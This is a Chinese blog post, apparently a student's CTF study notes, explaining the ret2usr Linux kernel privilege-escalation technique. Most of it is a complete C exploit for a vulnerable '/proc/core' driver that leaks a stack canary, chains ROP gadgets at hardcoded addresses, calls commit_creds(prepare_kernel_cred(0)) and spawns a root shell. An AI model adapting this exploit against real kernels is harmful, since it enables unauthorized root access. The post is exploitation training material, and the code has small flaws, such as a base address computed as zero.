Linux 内核PWN基础手法(不定期更新)

最新推荐文章于 2023-08-11 17:12:36 发布
最新推荐文章于 2023-08-11 17:12:36 发布
阅读量294 收藏 1
点赞数
文章标签: linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a2590035252/article/details/128009803
版权

Items

Linux 内核PWN基础手法

ret2usr 攻击利用了 用户空间的进程不能访问内核空间,但内核空间能访问用户空间 这个特性来定向内核代码或数据流指向用户控件,以 ring 0 特权执行用户空间代码完成提权等操作。

0x00 ret2user(no SMEP/SMAP)

ret2usr 攻击利用了 用户空间的进程不能访问内核空间,但内核空间能访问用户空间 这个特性来定向内核代码或数据流指向用户控件,以 ring 0 特权执行用户空间代码完成提权等操作。
我这里的自我理解那就是,在用户态定义了函数调用,然后我们在内核态的时候通过ROP等手法时期直接执行在用户态的代码,这样就实现了在内核态ring0的特权来执行用户代码,实际上还蛮简单的,虽然说这个利用手法在KPTI出现之后很少利用了,但是我毕竟还是刚学,所以还是得了解点的。

综上,所以咱们只需要在exp中添加这样一段代码即可:

void getRootPrivilige(void){
  void *(*prepare_kernel_cred_ptr)(void *) = prepare_kernel_cred;
  int (*commit_creds_ptr)(void *) = commit_creds;
  (*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}

这里也就是在咱们获得这俩兄弟的地址后在用户程序定义的函数调用,所以咱们只需在ROP中添加这个函数地址使其调用然后通过SWAPGS等系统调用返回用户态即可,以下是成功图!
(是不是很像上此文章的图,兄弟们你们听我狡辩啊不是听我解释,这我真的重新运行的,大伙别说我偷懒)

  1. 通过读取 /tmp/kallsyms 获取 commit_creds 和 prepare_kernel_cred 的方法相同,同时根据这些偏移能确定 gadget 的地址。
  2. leak canary 的方法也相同,通过控制全局变量 off 读出 canary。
  3. 与 kernel rop 做法不同的是 rop 链的构造:
    1. kernel rop 通过 内核空间的 rop 链达到执行 commit_creds(prepare_kernel_cred(0)) 以提权目的,之后通过 swapgs; iretq 等返回到用户态,执行用户空间的 system(“/bin/sh”) 获取 shell
    2. ret2usr 做法中,直接返回到用户空间构造的commit_creds(prepare_kernel_cred(0)) (通过函数指针实现)来提权,虽然这两个函数位于内核空间,但此时我们是 ring 0 特权,因此可以正常运行。之后也是通过 swapgs; iretq 返回到用户态来执行用户空间的 system(“/bin/sh”)

从这两种做法的比较可以体会出之所以要 ret2usr,是因为一般情况下在用户空间构造特定目的的代码要比在内核空间简单得多。(但是据我现在了解最不怕的就是他了(狗头))
以下是exp:

// gcc exp.c -o exp -static -masm=intel -g
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/ioctl.h>

size_t commit_creds = NULL, prepare_kernel_cred = NULL;        // address of to key function
#define SWAPGS_POPFQ_RET 0xffffffff81a012da
#define MOV_RDI_RAX_CALL_RDX 0xffffffff8101aa6a
#define POP_RDX_RET 0xffffffff810a0f49
#define POP_RDI_RET 0xffffffff81000b2f  
#define POP_RCX_RET 0xffffffff81021e53
#define IRETQ 0xffffffff81050ac2 
size_t user_cs, user_ss,user_rflags,user_sp;

//int fd = 0;        // file pointer of process 'core'

/*void saveStatus();
void get_function_address();
#void core_read(int fd, char* buf);
void change_off(int fd, long long off);
void core_copy_func(int fd, long long nbytes);
void print_binary(char* buf, int length);
void shell();
*/
void saveStatus(){
  __asm__("mov user_cs, cs;"
          "mov user_ss, ss;"
          "mov user_sp, rsp;"
          "pushf;"
          "pop user_rflags;"
          );
  puts("\033[34m\033[1m Status has been saved . \033[0m");
}


void getRootPrivilige(void){
  void *(*prepare_kernel_cred_ptr)(void *) = prepare_kernel_cred;
  int (*commit_creds_ptr)(void *) = commit_creds;
  (*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}
void core_read(int fd, char *addr){
  printf("try read\n");
  ioctl(fd,0x6677889B,addr);
  printf("read done!");
}

void change_off(int fd, long long off){
  printf("try set off \n");
  ioctl(fd,0x6677889C,off);
}

void core_copy_func(int fd, long long nbytes){
  puts("try cp\n");
  ioctl(fd,0x6677889A,nbytes);
}

void get_function_address(){
        FILE* sym_table = fopen("/tmp/kallsyms", "r");        // including all address of kernel functions,just like the user model running address.
        if(sym_table == NULL){
                printf("\033[31m\033[1m[x] Error: Cannot open file \"/tmp/kallsyms\"\n\033[0m");
                exit(1);
        }
        size_t addr = 0;
        char type[0x10];
        char func_name[0x50];
        // when the reading raises error, the function fscanf will return a zero, so that we know the file comes to its end.
        while(fscanf(sym_table, "%llx%s%s", &addr, type, func_name)){
                if(commit_creds && prepare_kernel_cred)                // two addresses of key functions are all found, return directly.
                        return;
                if(!strcmp(func_name, "commit_creds")){                // function "commit_creds" found
                        commit_creds = addr;
                        printf("\033[32m\033[1m[+] Note: Address of function \"commit_creds\" found: \033[0m%#llx\n", commit_creds);
                }else if(!strcmp(func_name, "prepare_kernel_cred")){
                        prepare_kernel_cred = addr;
                        printf("\033[32m\033[1m[+] Note: Address of function \"prepare_kernel_cred\" found: \033[0m%#llx\n", prepare_kernel_cred);
                }
        }
}


void shell(){
        if(getuid()){
                printf("\033[31m\033[1m[x] Error: Failed to get root, exiting......\n\033[0m");
                exit(1);
        }
        printf("\033[32m\033[1m[+] Getting the root......\033[0m\n");
        system("/bin/sh");
        exit(0);
}

int main(){
  saveStatus();
  int fd = open("/proc/core",2);              //get the process fd
  if(!fd){
                printf("\033[31m\033[1m[x] Error: Cannot open process \"core\"\n\033[0m");
                exit(1);
        }
  char buffer[0x100] = {0};
        get_function_address();                // get addresses of two key function
  ssize_t vmlinux = commit_creds - commit_creds;            //base address
  printf("vmlinux_base = %x",vmlinux);
  //get canary 
  size_t canary;
  change_off(fd,0x40);
  getchar();
  printf(fd);
  core_read(fd,buffer);
  canary = ((size_t *)buffer)[0];
  printf("canary ==> %p\n",canary);
  //build the ROP
  size_t rop_chain[0x1000] ,i= 0;
  printf("construct the chain\n");
  for(i=0; i< 10 ;i++){
    rop_chain[i] = canary;
  }
  rop_chain[i++] = (size_t)getRootPrivilige; 
  rop_chain[i++] = SWAPGS_POPFQ_RET + vmlinux;
  rop_chain[i++] = 0;
  rop_chain[i++] = IRETQ + vmlinux;
  rop_chain[i++] = (size_t)shell;
  rop_chain[i++] = user_cs;
  rop_chain[i++] = user_rflags;
  rop_chain[i++] = user_sp;
  rop_chain[i++] = user_ss;
  write(fd,rop_chain,0x800);
  core_copy_func(fd,0xffffffffffff0100); 
}
0==|]]]]]]]]]]]]]]]7
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
kernel pwn
nelson11112的博客
04-11 3609
比赛中的kernel pwn 比赛中我们会得到下面几个文件 正在上传…重新上传取消 bzImage 这是一个内核编译生成的压缩内核映像 core.cpio这是一个文件管理系统 针对core.cpio会有一系列常规操作 mkdir core cd core mv ../core.cpio core.cpio.gz // cp ../core.cpio core.cpio.gz gunzip core.cpio.gz cpio -idmv < core.cpio 然后我们在core..
老表带你学Linux kernel pwn 入门(二)
weixin_43889007的博客
11-08 581
启用kaslr、canary和smep的内核栈溢出提权
Linux内核PWN-基础ROP提权
a2590035252的博客
11-16 1259
内核提权提权提权!!!!
linux内核pwn,Pwn In Kernel(一):基础知识
weixin_39772566的博客
04-29 467
Kernel Pwn In CTF简单分析一下 CTF Kernel Pwn 题目的形式,以 2017 CISCN babydrive 为例。先对文件包解压➜ example lsbabydriver.tar➜ example file babydriver.tarbabydriver.tar: POSIX tar archive➜ example tar -xvf babydriver.t...
linux内核pwn,Linux内核pwn——劫持n_tty_ops指针
weixin_42355400的博客
04-29 313
0x001 前言以往多数的kernel pwn题都是基于内核扩展模块的漏洞分析,今天我们来看2018年Midnight Sun CTF一个无*.ko内核模块的题。题目下载:0x002 干掉定时logout由于内核运行一断时间后便会退出,需要解开文件系统,做一定修改mkdir coremv ./core.cpio ./core/cd corecpio -idmv < initrdrm init...
linux内核pwn,Linux kernel pwn基础
weixin_39600447的博客
04-29 335
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?主要记录一下学习linux kernel pwn遇到的命令以及相关函数、工具使用,之前没有接触过,有必要记录一下。模块相关123insmod:加载指定模块rmmod:卸载指定模块lsmod:查看已经加载的模块启动qemu123432位启动:qemu-system-i386 -kernel linux-2.6.32.1/a...
Linux kernel pwn notes(内核漏洞利用学习)
weixin_30326741的博客
08-03 1050
前言 对这段时间学习的 linux 内核中的一些简单的利用技术做一个记录,如有差错,请见谅。 相关的文件 https://gitee.com/hac425/kernel_ctf 相关引用已在文中进行了标注,如有遗漏,请提醒。 环境搭建 对于 ctf 中的 pwn 一般都是给一个 linux 内核文件 和一个 busybox 文件系统,然后用 qemu 启动起来。而且我觉得用 qemu 调试时 gd...
linux内核pwn,浅谈Linux Pwn Unlink机制
weixin_31361715的博客
04-29 495
unlink是堆溢出中的一种常见的利用形式,通过将双向列表中的空闲块拿出来与将要free的物理相邻的块进行合并。unlink对于最初接触的人来说机制比较难以理解,笔者会结合unlink的实现源码以及使用gdb调试对unlink进行阐述。unlink的触发当使用free函数释放正在使用的chunk时,会相应地检查其相邻的chunk是否为空闲,如果为空闲则会将相邻的chunk与free的chunk进行...
接触内核pwn(babydriver)
csdn546229768的博客
04-11 1040
文章目录分析思路保护gdb调试exp利用整体思路如下: 分析 拿到babydriver题目附件后得到的文件如下: 发现运行内核就报错,内容如下: Could not access KVM kernel module: No such file or directory qemu-system-x86_64: failed to initialize KVM: No such file or directory 未能初始化kvm,大概率是因为系统不支持虚拟化,具体可通过如下命令查看是否支持 egrep '^
linux kernel pwn系列(一)
weixin_41918450的博客
09-26 2791
kernel pwn题目不准备以总结的方式来写,准备每一道题做一个专门的分析。网上有不少exp,准备在他人的exp的基础上进行复现(因为能力不够所以在比赛时候做不出来,只能通过事后复现)计划写 强网杯core 和 solid_core,两道改编了csaw 2010kernel pwn的题目以及ciscn babydriver。总共三道题,入门kernel pwn绰绰有余。 第一篇主要介绍linux...
kernel-security-learning:关于内核安全性的一切。 CTF内核pwn内核利用,内核模糊和内核防御论文,内核调试技术,内核CVE调试
05-14
Kernel-Security-Learning Anything about kernel security. CTF kernel pwn & kernel exploit, kernel fuzz and kernel defense paper & kernel debugging technique & kernel CVE debug. Keep updating... 1. CTF linux内核提权系列教程(3):栈变量未初始化漏洞 【linux内核漏洞利用】ret2dir利用方法 【内核漏洞利用】绕过CONFIG_SLAB_FREELIST_HARDENED防护—kernoob两种解法 2. Paper (1)kernel exploit 2014-USENIX:ret2dir: Rethinking Kernel Isolation 2015-CCS:From coll
老表带你学Linux kernel pwn 入门(一)
weixin_43889007的博客
11-04 3054
不加任何保护机制的内核栈溢出提权
linux pwn 基础知识
最新发布
sky123博客
08-11 2621
环境搭建 虚拟机安装 镜像下载网站 为了避免环境问题建议 22.04 ,20.04,18.04,16.04 等常见版本 ubuntu 虚拟机环境各准备一份。注意定期更新快照以防意外。 虚拟机建议硬盘 256 G 以上,内存也尽量大一些。硬盘大小只是上界,256 G 不是真就占了 256 G,而后期如果硬盘空间不足会很麻烦。 基础工具 vim sudo apt install vim gedit 不习惯 vim 的可以使用 gedit 文本编辑器。 sudo apt install gedit git
老表带你学Linux kernel pwn 入门(三)
weixin_43889007的博客
11-12 500
double fetch 条件竞争
linux kernel pwn学习之UAF
seaaseesa的博客
02-29 1337
Linux Kernel UAF 与用户态下的glibc差不多,都是对已经释放的空间未申请就直接使用,内核的UAF往往是出现在多线程多进程多文件的情况下。即,假如某个用户程序对用一个内核驱动文件打开了两次,有两个文件描述符,它们都指向了该驱动,又因为是在同一个程序里,所以当我们释放掉其中一个文件描述符后,还可以使用另一个文件描述符来操控驱动。 为了加深理解,我们就以一题为例 ciscn201...
Kernel Pwn 入门 (2)
CoLin的pwn小屋
04-30 920
Kernel pwn 入门 (2)——ret2usr,UAF
Kernel Pwn 入门 (1)
CoLin的pwn小屋
04-24 3753
Kernel pwn 入门 (1):环境搭建、注意事项、第一个Kernel pwn题:QWB2018-Core
内核Pwn——LKM初探
m0_52196359的博客
10-27 2465
笔者水平所限,关于linux是如何实现设备文件化以及如何实现LKM的没能深入探究,本节着重于「如何使用」的实用角度来了解LKM。后续如果笔者水平有所提高,会从更加细致的角度来进行探究。
linux内核pwn,Linux Kernel Pwn 0:1
weixin_36473811的博客
04-29 186
0x00 Setup#基础概念#vmlinux 是未压缩的可执行内核文件vmlinuz 是压缩后的可执行文件 包括bzimage\zimageinitrd (initial ramdisk)是用于启动时临时引导硬件到内核的临时文件系统内核向下控制管理硬件,向上提供应用运行环境运行环境#apt-get install qemu-system启动命令示例qemu-system-x86_64 -init...
Linux pwn基础入门教程:环境配置到实战攻击
教程特别关注i386和amd64架构下的常见pwn手法,包括但不限于栈溢出、堆溢出、整数溢出、格式化字符串攻击和条件竞争。 教程特色在于提供了一个完整的学习路径,所有的环境都被封装在Docker镜像中,便于学生在不同...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值